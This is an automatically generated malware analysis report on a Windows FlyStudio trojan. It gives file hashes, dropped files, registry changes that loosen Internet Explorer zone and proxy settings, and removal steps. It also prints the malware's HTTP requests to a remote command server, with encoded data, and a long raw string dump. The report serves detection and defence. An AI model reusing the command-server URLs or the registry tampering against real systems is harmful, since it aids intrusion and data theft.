Skip to main content

Trojan.Win32.FlyStudio_b14c438e54


HEUR:VirTool.Win32.Generic (Kaspersky), Gen:Variant.Kazy.366076 (AdAware), Trojan.Win32.FlyStudio.FD, GenericEmailWorm.YR, TrojanFlyStudio.YR (Lavasoft MAS)Behaviour: Trojan, Worm, EmailWorm, VirTool

The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.

Summary

MD5: b14c438e5457723d7f8cd445b3d69401

SHA1: 48da1d1b3a2281fb59aa745b7466dd1316e55929

SHA256: b6dde1e3f56b5eab25a35c41e395a955f46e2051f2b2994cd755a48c3ea5214e

SSDeep: 49152:I0GEd/4JQfz5prnQ54QozUZnRQtA4NRrfX8DRGc1yUJGRyZU1c/SjrRNmNC44s9e:IVoJftJi4anRQmYrfM4coUBZ5i l

Size: 3862528 bytes

File type: EXE

Platform: WIN32

Entropy: Packed

PEID: UPolyXv05_v6

Company: Fusion Install

Created at: 2014-06-04 10:34:07

Analyzed on: WindowsXP SP3 32-bit

Summary: Trojan. A program that appears to do one thing but actually does another (a.k.a. Trojan Horse).

Dynamic Analysis

Payload

Behaviour Description
EmailWormWorm can send e-mails.


Process activity

The Trojan creates the following process(es):No processes have been created.The Trojan injects its code into the following process(es):

%original file name%.exe:208

Mutexes

The following mutexes were created/opened:

ZonesLockedCacheCounterMutexZonesCacheCounterMutexZonesCounterMutexWininetProxyRegistryMutexWininetConnectionMutexWininetStartupMutexc:!documents and settings!adm!local settings!history!history.ie5!c:!documents and settings!adm!cookies!c:!documents and settings!adm!local settings!temporary internet files!content.ie5!_!MSFTHISTORY!_RasPbFileShimCacheMutex

File activity

The process %original file name%.exe:208 makes changes in the file system.


The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\111[1].htm (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\desktop.ini (67 bytes)
%System%\SkinH_EL.dll (88 bytes)
%System%\esdpf.she (20 bytes)

Registry activity

The process %original file name%.exe:208 makes changes in the system registry.


The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 17 00 00 00 01 00 00 00 00 00 00 00"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "BA 6B C5 B4 5B 9D 0D 06 A1 75 0A AA DC D8 C2 28"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

Dropped PE files

MD5 File path
147127382e001f495d1842ee7a9e7912c:\WINDOWS\system32\SkinH_EL.dll

HOSTS file anomalies

No changes have been detected.

Rootkit activity

No anomalies have been detected.

Propagation

Removals

Remove it with Ad-Aware

  1. Click (here) to download and install Ad-Aware Free Antivirus.
  2. Update the definition files.
  3. Run a full scan of your computer.

Manual removal*

  1. Terminate malicious process(es) (How to End a Process With the Task Manager):No processes have been created.
  2. Delete the original Trojan file.
  3. Delete or disinfect the following files created/modified by the Trojan:

    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\111[1].htm (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\desktop.ini (67 bytes)
    %System%\SkinH_EL.dll (88 bytes)
    %System%\esdpf.she (20 bytes)

  4. Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
  5. Reboot the computer.
*Manual removal may cause unexpected system behaviour and should be performed at your own risk.

Static Analysis

VersionInfo

No information is available.

No information is available.

PE Sections

Name Virtual Address Virtual Size Raw Size Entropy Section MD5
.text4096107675000d41d8cd98f00b204e9800998ecf8427e
.rdata108134460366400d41d8cd98f00b204e9800998ecf8427e
.data168755240132200d41d8cd98f00b204e9800998ecf8427e
.rsrc20889603835283686401.56795352a9695457ee0ad5ff21f6565a784ad
.vmp02473984251735500d41d8cd98f00b204e9800998ecf8427e
.vmp049930244920400d41d8cd98f00b204e9800998ecf8427e
.vmp15046272348822034897925.49416bd74e24f97f5e8629357ae467e146b06

Dropped from:

Downloaded by:

Similar by SSDeep:

Similar by Lavasoft Polymorphic Checker:

Network Activity

URLs

URL IP
hxxp://221.123.147.73/111.asp?post=/33333.mdb2412511990317927241251123456789&2014304352632430223310325223122613267326
hxxp://221.123.147.73/piaoyh.aspx
hxxp://221.123.147.73/111.asp?post=/33333.mdb..1990317927..123456789&2014..6..23..22..3..

IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)

Traffic

GET /111.asp?post=/33333.mdb..1990317927..123456789&2014..6..23..22..3.. HTTP/1.1

Accept: */*

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

Host: 221.123.147.73

Connection: Keep-Alive

HTTP/1.1 200 OK

Date: Mon, 23 Jun 2014 23:58:01 GMT

Server: Microsoft-IIS/6.0

X-Powered-By: ASP.NET

Content-Length: 1

Content-Type: text/html

Set-Cookie: ASPSESSIONIDSQCSQQAT=GAFFIPFALLGKIGNGIKLLJCAK; path=/

Cache-control: private

2....

POST /piaoyh.aspx HTTP/1.1

Accept: */*

Accept-Language: en-us

Referer: hXXp://221.123.147.73/piaoyh.aspx

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)

Content-Type: application/x-www-form-urlencoded

accept-languge: zh-CN

Accept-Encoding: gzip, deflate

Host: 221.123.147.73

Content-Length: 12

Connection: Keep-Alive

Cache-Control: no-cache

Cookie: ASPSESSIONIDSQCSQQAT=GAFFIPFALLGKIGNGIKLLJCAK

p=97E121E98E

HTTP/1.1 200 OK

Date: Mon, 23 Jun 2014 23:58:05 GMT

Server: Microsoft-IIS/6.0

X-Powered-By: ASP.NET

X-AspNet-Version: 4.0.30319

Cache-Control: private

Content-Type: text/html; charset=gb2312

Content-Length: 32

00280096003A009600E1002800EE003A....

POST /piaoyh.aspx HTTP/1.1

Accept: */*

Accept-Language: en-us

Referer: hXXp://221.123.147.73/piaoyh.aspx

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)

Content-Type: application/x-www-form-urlencoded

accept-languge: zh-CN

Accept-Encoding: gzip, deflate

Host: 221.123.147.73

Content-Length: 191

Connection: Keep-Alive

Cache-Control: no-cache

Cookie: ASPSESSIONIDSQCSQQAT=GAFFIPFALLGKIGNGIKLLJCAK

p=54E60E63E52E56E54E59E54E121E81E109E109E110E102E46E113E109E121E111E95E124E101E100E&sbm=54E60E63E52E56E54E59E54E121E81E109E109E110E102E46E113E109E121E111E95E124E51E51E51E50E58E58E50E49E50E50E

HTTP/1.1 200 OK

Date: Mon, 23 Jun 2014 23:58:11 GMT

Server: Microsoft-IIS/6.0

X-Powered-By: ASP.NET

X-AspNet-Version: 4.0.30319

Cache-Control: private

Content-Type: text/html; charset=gb2312

Content-Length: 339

54E60E63E52E56E54E58E50E121E81E109E109E110E102E46E115E107E107E101E95E124E51E51E51E50E58E59E126E50E50E66E66E50E75E63E52E57E64E69E64E52E60E76E50E69E67E64E55E126E94E120E119E100E126E48E51E67E75E58E67E52E52E59E65E68E73E60E52E71E50E71E70E65E58E78E48E125E49E65E66E51E62E73E55E55E59E59E69E65E61E60E68E49E70E66E58E55E50E58E50E50E51E70E55E64E118E56E....

Map

The Trojan connects to the servers at the folowing location(s):

Strings from Dumps

%original file name%.exe_208:

.text

.text

`.rdata

`.rdata

@.data

@.data

.rsrc

.rsrc

@.vmp0

@.vmp0

`.vmp0

`.vmp0

`.vmp1

`.vmp1

g.EM^V7Z

g.EM^V7Z

EweB

EweB

e%f'G

e%f'G

.OO??b

.OO??b

cS.NO

cS.NO

.fF~p

.fF~p

EV.OrE

EV.OrE

X%fqwE

X%fqwE

$ÿ'

$ÿ'

òDC

òDC

.nO? 4

.nO? 4

M.Osc

M.Osc

}m.Bb~??

}m.Bb~??

.GFfz

.GFfz

k.bsSw

k.bsSw

Wn.QRA

Wn.QRA

.EEh(

.EEh(

b:\yL

b:\yL

\m.RB

\m.RB

]DU.Nmn

]DU.Nmn

<M><pre>Vm.BCP</pre><pre>3t5%f</pre><pre>.RQQA</pre><pre>e%F'G</pre><pre>>.NbC_</pre><pre>d%f'Kk</pre><pre>>..QQm</pre><pre>T.pO`x</pre><pre>MM.oO</pre><pre>t$(SSh</pre><pre>~%UVW</pre><pre>u$SShe</pre><pre>kernel32.dll</pre><pre>shlwapi.dll</pre><pre>user32.dll</pre><pre>ntdll.dll</pre><pre>ole32.dll</pre><pre>WinINet.dll</pre><pre>Wininet.dll</pre><pre>CreateWindowStationA</pre><pre>CloseWindowStation</pre><pre>ExitWindowsEx</pre><pre>HttpOpenRequestA</pre><pre>HttpSendRequestA</pre><pre>HttpQueryInfoA</pre><pre>GetAsyncKeyState</pre><pre>GetTcpTable</pre><pre>CreatePipe</pre><pre>MSXML2.XMLHTTP</pre><pre>Microsoft.XMLHTTP</pre><pre>MSXML2.ServerXMLHTTP</pre><pre>MSXML2.ServerXMLHTTP.6.0</pre><pre>WinHttp.WinHttpRequest.5.1</pre><pre>Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)</pre><pre>application/x-www-form-urlencoded</pre><pre>Freestyle.exe</pre><pre>config.ini</pre><pre>1000000001</pre><pre>http://221.123.147.73/zhuzhou.txt</pre><pre>drivers\etc\hosts.asp</pre><pre>&SQL=</pre><pre>HTTP/1.1</pre><pre>Content-Type: application/x-www-form-urlencoded</pre><pre>http://</pre><pre>1.ini</pre><pre>2.ini</pre><pre>3.ini</pre><pre>4.ini</pre><pre>.Aqwertyuiopasdfghjklzxcvbnm</pre><pre>c:\11.bmp</pre><pre>C$%cmb</pre><pre>.ppM|</pre><pre> aZ.mO</pre><pre>%-^</pre><pre>.hk;~</pre><pre>KERNEL32.DLL</pre><pre>COMCTL32.dll</pre><pre>GDI32.dll</pre><pre>MSIMG32.dll</pre><pre>MSVCRT.dll</pre><pre>MSVFW32.dll</pre><pre>USER32.dll</pre><pre>SkinH_EL.dll</pre><pre>%System%\SkinH_EL.dll</pre><pre>%u y2</pre><pre>0.du./</pre><pre>.K.cW</pre><pre>}.Dkn</pre><pre>OkC.xL</pre><pre>%System%\esdpf.she</pre><pre>1990317927</pre><pre>@kernel32.dll</pre><pre>90*('$$-</pre><pre>1-TOUCH PASS</pre><pre>F%*.*f</pre><pre>CNotSupportedException</pre><pre>commctrl_DragListMsg</pre><pre>Afx:%x:%x:%x:%x:%x</pre><pre>Afx:%x:%x</pre><pre>COMCTL32.DLL</pre><pre>CCmdTarget</pre><pre>__MSVCRT_HEAP_SELECT</pre><pre>SHLWAPI.dll</pre><pre>MPR.dll</pre><pre>VERSION.dll</pre><pre>WSOCK32.dll</pre><pre>.PAVCException@@</pre><pre>.PAVCNotSupportedException@@</pre><pre>.PAVCFileException@@</pre><pre>(*.prn)|*.prn|</pre><pre>(*.*)|*.*||</pre><pre>Shell32.dll</pre><pre>Mpr.dll</pre><pre>Advapi32.dll</pre><pre>User32.dll</pre><pre>Gdi32.dll</pre><pre>Kernel32.dll</pre><pre>(&07-034/)7 '</pre><pre>?? / %d]</pre><pre>%d / %d]</pre><pre>: %d]</pre><pre>(*.WAV;*.MID)|*.WAV;*.MID|WAV</pre><pre>(*.WAV)|*.WAV|MIDI</pre><pre>(*.MID)|*.MID|</pre><pre>(*.txt)|*.txt|</pre><pre>(*.JPG;*.BMP;*.GIF;*.ICO;*.CUR)|*.JPG;*.BMP;*.GIF;*.ICO;*.CUR|JPG</pre><pre>(*.JPG)|*.JPG|BMP</pre><pre>(*.BMP)|*.BMP|GIF</pre><pre>(*.GIF)|*.GIF|</pre><pre>(*.ICO)|*.ICO|</pre><pre>(*.CUR)|*.CUR|</pre><pre>%s:%d</pre><pre>windows</pre><pre>out.prn</pre><pre>%d.%d</pre><pre>%d / %d</pre><pre>%d/%d</pre><pre>Bogus message code %d</pre><pre>(%d-%d):</pre><pre>%ld%c</pre><pre>http://dywt.com.cn</pre><pre>service@dywt.com.cn</pre><pre> 86(0411)88995834</pre><pre> 86(0411)88995831</pre><pre>Windows</pre><pre>(ESPINN.dll(NN</pre><pre>This is a runtime library file for EPL applications. The EPL is a software development environment. For details please visit www.dywt.com.cn/info</pre><pre>CallerInfoCopyCmd</pre><pre>SetIPPort</pre><pre>GetIPPort</pre><pre>"C:\Windows\System32\ESPI11.dll"</pre><pre>ProviderInstallCopyCmd</pre><pre>SockDataCopyCmd</pre><pre>SockAddrCopyCmd</pre><pre>enetintercept_fnSockAddrSetIPPort</pre><pre>enetintercept_fnSockAddrGetIPPort</pre><pre>enetintercept_fnInstallCopyCmd</pre><pre>enetintercept_fnSockDataCopyCmd</pre><pre>enetintercept_fnSockAddrCopyCmd</pre><pre>enetintercept_fnCallerInfoCopyCmd</pre><pre>%s\ESPI%d.dll</pre><pre>HTTP/1.0</pre><pre>%s <%s></pre><pre>Reply-To: %s</pre><pre>From: %s</pre><pre>To: %s</pre><pre>Subject: %s</pre><pre>Date: %s</pre><pre>Cc: %s</pre><pre>%a, %d %b %Y %H:%M:%S</pre><pre>SMTP</pre><pre>www.dywt.com.cn</pre><pre>X-X-X-X-X-X</pre><pre><Msg%s>%ld</Msg%s></pre><pre>0000%d</pre><pre></pre><pre><Msg0000></Msg0000></pre><pre>EMSG</pre><pre>Recv Sub Packet(%s)..</pre><pre>Recv Packet (%s)...</pre><pre>1.1.3</pre><pre>;3 #>6.&</pre><pre>'2, / 0&7!4-)1#</pre><pre>%d%d%d</pre><pre>rundll32.exe shell32.dll,</pre><pre>.PAVCObject@@</pre><pre>.PAVCSimpleException@@</pre><pre>.PAVCMemoryException@@</pre><pre>.?AVCNotSupportedException@@</pre><pre>.PAVCResourceException@@</pre><pre>.PAVCUserException@@</pre><pre>.?AVCCmdTarget@@</pre><pre>.?AVCCmdUI@@</pre><pre>.?AVCTestCmdUI@@</pre><pre>.PAVCArchiveException@@</pre><pre>zcÁ</pre><pre>c:\%original file name%.exe</pre><pre> (&''&(,</pre><pre>*%).--.)%$</pre><pre>#include "l.chs\afxres.rc" // Standard components</pre><pre>>6n.Rr:,</pre><pre>WEBh</pre><pre>D$%%f&G</pre><pre>Vm.BB</pre><pre>|f.oz</pre><pre>n.nn/</pre><pre>5vBN.rR,</pre><pre>5%FWq</pre><pre>],.yx</pre><pre>.fJ&7</pre><pre>.GhX3</pre><pre>H,.sS</pre><pre>-DEYZ}</pre><pre>H<M><pre>>.Nb!V</pre><pre>;<M%f><pre>5-%%FjZ</pre><pre> l%fG</pre><pre>J.fWvVg</pre><pre>_, 792:"</pre><pre>$EE%f</pre><pre>:#Sz%u</pre><pre>n.Rr:$</pre><pre>l%uJ8</pre><pre>%fz[&</pre><pre>7Ww%f</pre><pre>%f:El3</pre><pre>.Rr: EP</pre><pre>.RB%eU</pre><pre>=-.Bb</pre><pre>.OscF6Vj^j</pre><pre>,LM.OP</pre><pre>J*.nB</pre><pre>.OscF&</pre><pre>.N.op</pre><pre>.RJK;</pre><pre>hI%ul</pre><pre>yf.oz</pre><pre>t!:%su</pre><pre>ÿ6w</pre><pre>Kn.BQ</pre><pre>6.Or:</pre><pre>-Aa}=</pre><pre>6.EEh</pre><pre>:$X-0}|</pre><pre>%0xpu</pre><pre>*b.ar3</pre><pre>CD%%F</pre><pre>)>.Oc</pre><pre> #-mx}</pre><pre>W:\Jn</pre><pre>.Nr:%</pre><pre>.oz(~</pre><pre>N:%xI</pre><pre>Q:%ss</pre><pre>|\:%u;</pre><pre>{m:%f</pre><pre>4X:%dW</pre><pre>%Xym:%X </pre><pre>v!:%S</pre><pre>:%CX7</pre><pre>.RJBCC$e</pre><pre>cS.gH</pre><pre>%FjZ54</pre><pre>z%f::5\</pre><pre>-.RQP</pre><pre>w%Fj::</pre><pre>6:|s.vr</pre><pre>t5%fz</pre><pre>DU.nE</pre><pre>n.RQQA</pre><pre>.PXjk-z[</pre><pre>SQL F</pre><pre>%fwe%</pre><pre>.FfVw5</pre><pre>M.RB%></pre><pre>eE%f'</pre><pre>~V.Nrb</pre><pre>.RR:8|p</pre><pre>.FFZE</pre><pre>.Os4:&</pre><pre>D$ B!.Wh</pre><pre>,=>("{[-></pre><pre>~|/f.yx~;</pre><pre>.Rr:></pre><pre>-.RSw</pre><pre>ôt:></pre><pre>ymEÿ</pre><pre>N.Rs:></pre><pre>.pweo</pre><pre>.ol0c</pre><pre>ev.NLL</pre><pre>l-M.Nr3:?z</pre><pre>:?e%fw</pre><pre>..op0</pre><pre>.Osc>V</pre><pre>6.NqE</pre><pre>N%fwE</pre><pre>D$$%u</pre><pre>bX*%u</pre><pre>m.NOs</pre><pre>%.RcDh</pre><pre> e.fF</pre><pre>!n.RB</pre><pre>%~<M><pre>.WE}]-G</pre><pre>D<45ò</pre><pre>-i1l}</pre><pre>llzCJ%U</pre><pre>-=N.RB</pre><pre>.fGk O:2</pre><pre>*N.RB</pre><pre>v.OEO<</pre><pre>3.um.</pre><pre>^,0<83:2</pre><pre>[]M.By^</pre><pre>?:3E.WhH</pre><pre>.LCT-</pre><pre>%Fj:3(</pre><pre>m.nNn</pre><pre>.Rr:0</pre><pre>mK.CQe</pre><pre>D$$1%x4</pre><pre>%Fj :0R</pre><pre>.inzE</pre><pre>5%fz;W8</pre><pre>b"Cc$%f&</pre><pre> n)|.CU</pre><pre>e\.YvRc</pre><pre>#D%%F</pre><pre>.N.nO</pre><pre>rM.nn</pre><pre>w%F:6.</pre><pre>.Pa!EDD4</pre><pre>KV.Xi</pre><pre>m..nOp</pre><pre>~n*%uNg</pre><pre>.EEYYm</pre><pre>.RB%></pre><pre> :.Ne</pre><pre>%Fj:6</pre><pre>.FfV12</pre><pre>m.Nrb</pre><pre>}m.Bv</pre><pre>_,6<92:4</pre><pre>$.Oc9</pre><pre>#c$%F</pre><pre>Zn.BQ</pre><pre>n.RS:2</pre><pre>ÿ##G7</pre><pre>E5.ws</pre><pre>&J:.ff~</pre><pre>.NbBV</pre><pre>=N.Rk</pre><pre>?cS6.nOsc</pre><pre>D$ (%9U</pre><pre>cDd%f</pre><pre>.OP0T</pre><pre>D$<7%s4</pre><pre>x%fYj</pre><pre>.Nq2FM</pre><pre>mn.vaV</pre><pre>7.gVg:</pre><pre>d%FG'</pre><pre>.QRvf</pre><pre>.KPay</pre><pre>*%u-,D</pre><pre>.Egio</pre><pre>uU.fe</pre><pre>N.RB6n.</pre><pre>} m.Os</pre><pre>n.yasw/@</pre><pre>-.Rr:</pre><pre>"cd%F&</pre><pre>.Nrjk[</pre><pre>K$..BV</pre><pre>.Ok &</pre><pre>Jn.RB</pre><pre>.Nj*N\</pre><pre>^*.af</pre><pre>H E%8x@i</pre><pre>,\m.RB</pre><pre>*=$H</pre><pre>%FjZ5</pre><pre>D$,%c;2</pre><pre>.Vgff</pre><pre>D$<1%x4</pre><pre>V.-e}5</pre><pre>L|.yh 1q</pre><pre>"3t|.yP</pre><pre>V.Vhm</pre><pre>l-.RB</pre><pre>.oOs4</pre><pre>.Jkiz</pre><pre>?.hizS</pre><pre>%F'gg</pre><pre>D$$%s</pre><pre>.nh7F</pre><pre>öWk</pre><pre>.Ey%FN</pre><pre>.LePa</pre><pre>.Nrb=VwO</pre><pre>)Jm.RB</pre><pre>.ajBS</pre><pre>%XltIl</pre><pre>.mAdx#</pre><pre>!,;2%Dkr</pre><pre>.AXO>]lyOd</pre><pre>%FH7f</pre><pre>2u!63%f</pre><pre>5J@Ü</pre><pre>#d.NHF</pre><pre>&.Vx}</pre><pre>jJ%8x</pre><pre>WINMM.dll</pre><pre>WS2_32.dll</pre><pre>GetWindowsDirectoryA</pre><pre>WINSPOOL.DRV</pre><pre>UnregisterHotKey</pre><pre>RegEnumKeyA</pre><pre>ShellExecuteA</pre><pre>)~.cQ</pre><pre>d3%6x</pre><pre>]Qo@%x</pre><pre>È~qJ</pre><pre>.Rv}#</pre><pre>&/%x0p</pre><pre>J.rhd</pre><pre>*.VP=</pre><pre>LF.LF</pre><pre>CreateDialogIndirectParamA</pre><pre>SetViewportOrgEx</pre><pre>@.vl]</pre><pre>^6a.yUZ</pre><pre>?X.bry</pre><pre>.qL@.^H</pre><pre>.ntPrN</pre><pre>`-21$%DH</pre><pre> .GK`,/</pre><pre>' .,5?9@'</pre><pre>wgio.kj</pre><pre>(.KI*\</pre><pre>'.nU'6</pre><pre>$^0(4635</pre><pre>-in}I</pre><pre>_^.go</pre><pre>KRQU.Xb</pre><pre>.-(263?@</pre><pre>% -46?>@</pre><pre>7bn.pu</pre><pre>\v\.ad</pre><pre>e !%F</pre><pre>%uLqs~X</pre><pre>%gm.ku</pre><pre>8L.Xh_e</pre><pre>?=E.OV</pre><pre>[%c{H</pre><pre>FJOQ.UV</pre><pre>WeBn</pre><pre>fk-hmpx}</pre><pre>hudp</pre><pre>~"$!-(1<</pre><pre>$p.to</pre><pre>HO.NR</pre><pre>jh.ry</pre><pre>.KYHq</pre><pre>WAw]%XX] </pre><pre>'"/8-.*, </pre><pre>?WZ.Xa</pre><pre>%X$)13</pre><pre>%F"@:</pre><pre>$-164138</pre><pre>Y].cf</pre><pre>`l.mw</pre><pre>]`eik.om</pre><pre>e(#&.OJ</pre><pre>#(0352>:</pre><pre>MKS.VQ</pre><pre>".ODA</pre><pre>DKR[f.no</pre><pre>GAC.IM</pre><pre>1;GCE.NIhHK</pre><pre>OEXe</pre><pre>~72K.dH@</pre><pre>68=;V<.GK(NV]^Z</pre><pre>zY.hL</pre><pre>.AqVm</pre><pre>POo>.hJ</pre><pre>.pl/)T</pre><pre>;D.jy!</pre><pre>oi4.YS</pre><pre>Wl.MYH</pre><pre>"=N.CHC</pre><pre>=T%Xz3</pre><pre>E.tO{I</pre><pre>PZfoO.aN</pre><pre>.jueI</pre><pre>O0.Ya</pre><pre>.Nk/}</pre><pre>2.NrO</pre><pre>1.ZT[</pre><pre>QA.tB</pre><pre>.my.(</pre><pre>J[.TO</pre><pre>KR.kQ</pre><pre>.WWQeJ</pre><pre>.DHtS</pre><pre>%UGNV</pre><pre>/(X.bl</pre><pre>.XEU^</pre><pre>%x9}o</pre><pre>H%sia</pre><pre>.miQ,</pre><pre>%d`;L'iCN</pre><pre>q.xCg</pre><pre>B:\8o@</pre><pre>.gr=6Z</pre><pre>WININET.dll</pre><pre>RegDeleteKeyA</pre><pre>ADVAPI32.dll</pre><pre>InternetCrackUrlA</pre><pre>OLEAUT32.dll</pre><pre>SetWindowsHookExA</pre><pre>RegisterHotKey</pre><pre>GetViewportExtEx</pre><pre>RegOpenKeyA</pre><pre>6u!'$%f</pre><pre>RASAPI32.dll</pre><pre>.CxeYi</pre><pre>The procedure entry point %c could not be located in the dynamic link library %s</pre><pre>The ordinal %u could not be located in the dynamic link library %s</pre><pre>GetProcessHeap</pre><pre>InternetCanonicalizeUrlA</pre><pre>OffsetViewportOrgEx</pre><pre>WinExec</pre><pre>@0@@@8@ @</pre><pre>=.lh4.</pre><pre>S%XQ([H</pre><pre>DI.UQ</pre><pre># ,) 126</pre><pre>X".CO</pre><pre>xD.COX</pre><pre>W.hp@</pre><pre>^`.mk</pre><pre>9.AE`DHQW</pre><pre>WG.alq</pre><pre>/'%SzW</pre><pre>%&#/.(51</pre><pre>70>;:@/,</pre><pre>e.oh/u</pre><pre>/I.OO</pre><pre>%.ORs</pre><pre>.mdxp</pre><pre>Y%u(p</pre><pre>b615?GM.PY</pre><pre>Jp$.OLD</pre><pre>b%sMn</pre><pre>"!@'#,19</pre><pre>3S.OG</pre><pre>.KT`_fcd</pre><pre>:v=D.OJ</pre><pre>a.zx(</pre><pre>%Dx*R </pre><pre>\.xR@</pre><pre>.ns)zx</pre><pre>7ce.nw</pre><pre>0%FIPF</pre><pre>.;.ibi</pre><pre>.OzHo=1</pre><pre>n'.KR</pre><pre>%xRWU]</pre><pre>8?>7D.IW</pre><pre>v16.JX</pre><pre>HVZ.XY</pre><pre>*-0,(53?]</pre><pre>"*/4368.GJf</pre><pre>ib.mT</pre><pre>4M.YH</pre><pre>4Y`en.oi7</pre><pre>.!)`5<8:</pre><pre>.gl#(</pre><pre>bKeY</pre><pre> 01?F@I.OT</pre><pre>(.HSO</pre><pre>$&! 517</pre><pre>{@'(3251?&</pre><pre>Ê1(*</pre><pre>f.EK0</pre><pre>!,. 3(2;8'"</pre><pre>Î@I</pre><pre>ef.kn)q{5</pre><pre>t-.WD</pre><pre>.DC_)@q</pre><pre>$!-.43<)</pre><pre>.XHm_</pre><pre>u_bnw.rz</pre><pre>.)689?;></pre><pre>' .(6740</pre><pre>Bk.wv</pre><pre>.pyP}</pre><pre>9<D><pre>Y`.mt</pre><pre>[%/-08=?</pre><pre>!o.XJA|,</pre><pre>[y%.Pas</pre><pre>` ðA</pre><pre>%Fj>j</pre><pre>T^\_[X.dnF</pre><pre>3.ePf</pre><pre>$! '#,0:</pre><pre>!*/)6.5<</pre><pre>MU]fa.gl</pre><pre>ZY.KJ</pre><pre>XZ(.TL</pre><pre>H:.woz`</pre><pre>UWP]aio.np</pre><pre>V8.EC</pre><pre>& #(1159</pre><pre>.6?<.GI8KLJQR</pre><pre>#/0)4265</pre><pre>.GDe(d</pre><pre>~B.Fg</pre><pre>`.joxpsqr</pre><pre>Q.upeK</pre><pre>-Xd},</pre><pre>,4>8EAL.MV</pre><pre> .HqK</pre><pre>5'".ME</pre><pre>" !-)72?</pre><pre>.ovxnr~</pre><pre>gV`.jp</pre><pre>p5T24V=.DCJM</pre><pre>n/.ON</pre><pre>*.,/521=</pre><pre>j(/)0=.FD@HMITUq5</pre><pre>"j%FP</pre><pre>! -1427<</pre><pre>t%Do}4</pre><pre>;.EMV</pre><pre>.b.OU</pre><pre>BDL.VSIXc</pre><pre>| "/, 536=>:</pre><pre>$".745>6</pre><pre>?9CK.WZ</pre><pre>mlknj.vw</pre><pre>Ygb.nw</pre><pre>.jWZ4</pre><pre>%fjb1</pre><pre>.LS[Z 